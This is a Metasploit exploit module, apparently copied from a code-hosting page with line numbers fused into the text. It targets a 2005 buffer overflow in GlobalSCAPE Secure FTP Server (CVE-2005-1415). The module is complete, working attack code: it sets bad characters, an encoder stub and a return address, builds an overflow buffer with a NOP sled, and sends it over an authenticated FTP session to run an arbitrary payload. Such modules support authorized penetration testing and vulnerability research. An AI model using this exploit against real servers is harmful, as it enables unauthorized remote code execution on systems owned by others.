Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/ftp/globalscapeftp_input.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Ftp910def initialize(info = {})11super(update_info(info,12'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow',13'Description' => %q{14This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.15All versions prior to 3.0.3 are affected by this flaw. A valid user account (16or anonymous access) is required for this exploit to work.17},18'Author' => [ 'Fairuzan Roslan <riaf[at]mysec.org>', 'Mati Aharoni <mati[at]see-security.com>' ],19'License' => BSD_LICENSE,20'References' =>21[22[ 'CVE', '2005-1415'],23[ 'OSVDB', '16049'],24[ 'BID', '13454'],25[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],26],27'Privileged' => false,28'Payload' =>29{30'Space' => 1000,31'BadChars' => "\x00\x20" + (0x61..0x7a).to_a.pack('C*'),32'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",33},34'Platform' => [ 'win' ],35'Targets' =>36[37[38'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',39{40'Ret' => 0x1002f01f,41},42],43],44'DisclosureDate' => '2005-05-01',45'DefaultTarget' => 0))46end4748def exploit49c = connect_login50return if not c5152buf = make_nops(3047)53buf[2043, 4] = [ target.ret ].pack('V')54buf[2047, payload.encoded.length] = payload.encoded5556send_cmd( [buf] )5758handler59disconnect60end61end626364